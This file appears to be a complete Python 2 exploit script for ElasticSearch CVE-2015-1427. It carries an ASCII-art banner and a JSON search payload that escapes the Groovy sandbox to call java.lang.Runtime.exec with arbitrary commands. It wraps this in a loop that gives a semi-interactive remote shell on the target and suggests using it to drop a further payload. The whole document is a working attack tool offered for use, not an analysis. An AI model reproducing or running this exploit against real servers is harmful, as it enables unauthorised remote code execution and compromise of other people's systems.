#!/bin/python2 # coding: utf-8 # Author: Darren Martyn, Xiphos Research Ltd. # Version: 20150309.1 # Licence: WTFPL - wtfpl.net import json import requests import sys import readline readline.parse_and_bind('tab: complete') readline.parse_and_bind('set editing-mode vi') __version__ = "20150309.1" def banner(): print """\x1b[1;32m ▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓ ▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ ▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ ▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ ░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒ ░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░ ░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__) def execute_command(target, command): payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command) try: url = "http://%s:9200/_search?pretty" %(target) r = requests.post(url=url, data=payload) except Exception, e: sys.exit("Exception Hit"+str(e)) values = json.loads(r.text) fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0] print fuckingjson.strip() def exploit(target): print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something" while True: cmd = raw_input("~$ ") if cmd == "exit": sys.exit("{!} Shell exiting!") else: execute_command(target=target, command=cmd) def main(args): banner() if len(args) != 2: sys.exit("Use: %s target" %(args[0])) exploit(target=args[1]) if __name__ == "__main__": main(args=sys.argv)